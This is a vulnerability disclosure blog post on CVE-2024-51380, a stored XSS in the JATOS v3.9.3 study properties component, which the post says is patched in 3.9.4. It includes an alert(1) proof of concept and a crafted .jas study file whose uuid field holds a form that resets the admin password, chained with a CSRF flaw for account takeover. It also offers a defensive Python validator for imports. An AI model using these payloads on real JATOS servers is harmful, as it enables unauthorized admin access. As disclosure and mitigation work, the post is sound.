CVE-2024-51380 | JATOS v3.9.3 Stored XSS | Properties Component
Introduction to CVE #2
CVE #1 highlights a critical security vulnerability within the application that poses significant risks to user data and system integrity. This Stored XSS (Cross-Site Scripting) flaw enables an attacker to execute JavaScript in a user’s browser, leading to unauthorized actions and account takeover.
What is JATOS
JATOS is a powerful web-based platform designed to conduct psychological experiments and surveys online. It enables researchers to create, distribute, and gather data from participants in a controlled environment, making it a versatile tool in the field of psychological research.
The platform boasts a user-friendly interface that allows researchers to set up experiments without requiring extensive programming knowledge, making it accessible to a broader audience. Additionally, JATOS supports multi-platform usage, enabling experiments to be run on various devices, including computers, tablets, and smartphones, which significantly expands participant reach.
One of the standout features of JATOS is its real-time data collection capability, which allows researchers to gather and analyze results efficiently. It also offers integration with other tools and platforms, providing flexibility in experimental design. As an open-source software, JATOS allows researchers to customize the platform according to their specific needs, further enhancing its utility.
JATOS was developed by Kristian Lange and Elisa Filevich, who aimed to create an effective solution for online research. Speaking with Kristian, he made me understand that he is currently the only developer still maintaining JATOS. This is particularly impressive given the extensive capabilities of the platform and the demands of ongoing development and support. It’s an amazing achievement for a solo developer to sustain such a robust and widely used tool in the research community.
I want to highlight that, thanks to the excellent collaboration with Kristian, the issues identified in this blog article have been successfully patched in version 3.9.4.
Exploitation Phase
Now that you clearly understand what JATOS is, let’s delve deeper into the specifics of this CVE and explore how an attacker might exploit it. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to gain elevated privileges.
Simple Exploitation
To exploit the Stored XSS vulnerability in the properties component of the study section, an attacker can export a study, modify the .jas file to include <script>alert(1)</script> in the first UUID section, and then re-import the study. When the properties section is accessed, the JavaScript will be executed. This is particularly concerning because if a study containing such a payload is assigned to an admin, the admin may inadvertently execute JavaScript crafted by a user in their browser.
A strong recommendation to address this issue is to validate the .jas file during import, ensuring that HTML and JavaScript tags are not present in fields where they are disallowed (the uuid field in particular should only ever hold a well-formed UUID), and to HTML-encode those values wherever the properties view renders them.
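The following import-side validator is an added example written for this article; it is not JATOS code. It parses a .jas export, requires every uuid field to be a real RFC 4122 UUID, and rejects markup in the plain-text fields (the list of fields treated as plain text is an assumption). Both sample documents are constructed for the example.

```python
import json
import re

# Constructed samples (not real JATOS exports): a clean export and one whose
# study uuid carries the script tag described in the article.
VALID_JAS = ('{"version":"3","data":{"uuid":"c1b2e3d4-5f67-4a89-9b01-23456789abcd",'
             '"title":"Memory task","description":"a < b is fine","comments":"",'
             '"componentList":[{"uuid":"d2c3f4e5-6a78-4b90-8c12-3456789abcde","title":"Trial 1"}],'
             '"batchList":[{"uuid":"e3d4a5f6-7b89-4c01-9d23-456789abcdef","title":"Default"}]}}')
MALICIOUS_JAS = ('{"version":"3","data":{"uuid":"<script>alert(1)</script>","title":"testing",'
                 '"description":"","comments":"","componentList":[],'
                 '"batchList":[{"uuid":"12345","title":"Default"}]}}')

UUID_RE = re.compile(r"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$")
# A '<' immediately followed by a tag name, '/', '!' or '?' is markup; a bare "<" in prose is not.
TAG_RE = re.compile(r"<[/!?A-Za-z]")
# Assumption: these study fields are plain text and must never carry markup.
PLAIN_TEXT_FIELDS = ("title", "description", "comments")


def find_violations(jas_text):
    """Return a list of (json_path, reason) for every field that fails validation."""
    data = json.loads(jas_text).get("data", {})
    violations = []

    def check_uuid(path, value):
        if not isinstance(value, str) or not UUID_RE.match(value):
            violations.append((path, "uuid is not an RFC 4122 UUID"))

    def check_text(path, value):
        if isinstance(value, str) and TAG_RE.search(value):
            violations.append((path, "HTML/script markup not allowed"))

    check_uuid("data.uuid", data.get("uuid"))
    for field in PLAIN_TEXT_FIELDS:
        check_text(f"data.{field}", data.get(field))
    for list_name in ("componentList", "batchList"):
        for i, item in enumerate(data.get(list_name, [])):
            check_uuid(f"data.{list_name}[{i}].uuid", item.get("uuid"))
            check_text(f"data.{list_name}[{i}].title", item.get("title"))
    return violations


def is_safe_to_import(jas_text):
    """True only when no field violates the import rules."""
    return not find_violations(jas_text)
```

Rejecting the file before it is persisted stops the payload from ever reaching an administrator's browser; output encoding in the properties view remains the second line of defence.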
Attacker Scenario Exploiting the Vulnerability
This vulnerability could be exploited in conjunction with CVE #4 | JATOS v3.9.3 CSRF | Admin Password Reset, enabling a regular user to reset an admin password.
To exploit this vulnerability, the user would first create a new study within the application. After setting up the study, they would export the corresponding .jas file. Next, the user would modify this file to embed a malicious JavaScript snippet inside the UUID. Once the modifications are complete, the user would re-import the study back into the application. Afterward, they would assign the study to an administrator. Finally, when the admin clicks on the properties section of the study, the embedded JavaScript executes, potentially compromising the system.
{"version":"3","data":{"uuid":"<form action='http://localhost.com:9000/jatos/user/passwordByAdmin' method='POST'><input type='hidden' name='newPassword' value='adminnewpassword123'><input type='hidden' name='username' value='admin'><button type='submit'>Submit</button></form>","title":"testing","description":"","groupStudy":false,"linearStudy":false,"allowPreview":true,"dirName":"admin","comments":"","jsonData":null,"endRedirectUrl":"","studyEntryMsg":"hi guys","componentList":[],"batchList":[{"uuid":"12345","title":"Default","active":true,"maxActiveMembers":null,"maxTotalMembers":null,"maxTotalWorkers":null,"allowedWorkerTypes":["PersonalSingle","Jatos","PersonalMultiple"],"comments":null,"jsonData":null}]}}
When the administrator clicks on the description section of this study, a CSRF attack is triggered to change the admin password, effectively granting the attacker administrative privileges.
This enables the attacker to log into the admin account, compromising the integrity, confidentiality, and availability of the application, especially if any studies are deleted.
Other References
For the latest updates on my developments and research, be sure to check out my GitHub profile.